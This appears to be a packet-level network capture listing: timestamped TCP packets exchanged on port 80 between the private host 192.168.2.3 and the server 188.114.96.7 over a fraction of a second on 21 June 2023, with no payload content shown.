Jun 21, 2023 04:27:46.900659084 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900669098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900710106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900743961 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900758028 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900796890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900830030 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900846004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900883913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900924921 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.900929928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.900969982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901012897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.901020050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901060104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901094913 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.901108980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901145935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901180029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.901194096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901231050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901266098 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.901278973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901316881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901350021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.901364088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.901429892 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.901429892 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.908687115 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920456886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920495033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920526981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920563936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920569897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920599937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920630932 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920636892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920671940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920672894 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920705080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920737028 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920737028 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920744896 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920773983 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920783997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920814037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920841932 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920851946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920881033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920886993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920917034 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.920947075 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.920953989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.921350956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.932827950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.932879925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.932915926 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.932962894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933006048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933024883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933051109 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933140039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933257103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933295012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933321953 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933348894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933360100 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933393955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933437109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933475018 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933510065 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933525085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933562040 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933577061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933629036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933665991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933677912 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933717966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933754921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933792114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933829069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933836937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933875084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933906078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.933923006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.933962107 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.934009075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.934051037 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.934057951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.934125900 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.937845945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.937902927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.937953949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.937997103 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938014030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938056946 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938076019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938124895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938163996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938183069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938230991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938292027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938334942 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938350916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938399076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938440084 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938458920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938498020 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938519001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938580990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938626051 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938638926 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938704967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938750029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938793898 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938808918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938869953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938913107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938930035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.938977003 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.938991070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939038038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939099073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939138889 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939158916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939198017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939219952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939266920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939326048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939369917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939387083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939429045 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939448118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939492941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939533949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939555883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939604044 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939665079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939687967 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939719915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939765930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939806938 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939825058 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939874887 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.939886093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939937115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.939982891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940026999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940054893 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940054893 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940080881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940141916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940187931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940223932 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940247059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940296888 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940325022 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940385103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940427065 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940443039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940490007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940535069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940555096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940599918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940651894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940658092 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940702915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940757036 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940763950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940810919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940856934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940905094 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940920115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.940968037 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.940978050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941036940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941098928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941112995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941162109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941196918 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941222906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941271067 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941314936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941358089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941378117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941401005 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941436052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941483021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941530943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941572905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941590071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941637039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941675901 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941695929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941740990 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941756964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941814899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941859007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.941878080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941921949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.941967010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942008972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.942027092 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942071915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942111015 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.942130089 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942176104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942214012 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.942234993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942281008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942320108 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.942339897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942384958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942425966 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.942444086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942491055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942534924 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.942552090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942856073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942898989 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.942912102 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.942956924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943002939 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943013906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943058968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943099022 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943115950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943161964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943202972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943221092 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943264961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943308115 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943322897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943367958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943406105 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943428040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943471909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943511963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943530083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943568945 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943591118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943634987 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943680048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943726063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943763971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943783045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943830013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943871021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943888903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943932056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.943969011 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.943990946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944036961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944082975 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944092989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944138050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944180965 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944196939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944243908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944289923 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944319963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944366932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944406986 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944425106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944469929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944509029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944528103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944575071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944613934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944634914 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944680929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944720984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944740057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944787979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944825888 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944844961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944891930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944931984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.944950104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.944997072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945039988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945055008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945101976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945146084 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945158005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945205927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945245028 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945264101 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945326090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945372105 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945382118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945425987 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945471048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945516109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945543051 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945573092 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945619106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945663929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945708990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945749998 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945770025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945815086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945852041 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945873022 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945918083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.945961952 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.945976019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946024895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946063042 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946083069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946127892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946166992 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946187019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946230888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946271896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946289062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946335077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946382046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946396112 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946455956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946497917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946516037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946566105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946626902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946669102 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946686983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946733952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946774960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946777105 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946825027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946873903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.946897984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.946928024 CEST	80	49709	188.114.96.7	192.168.2.3
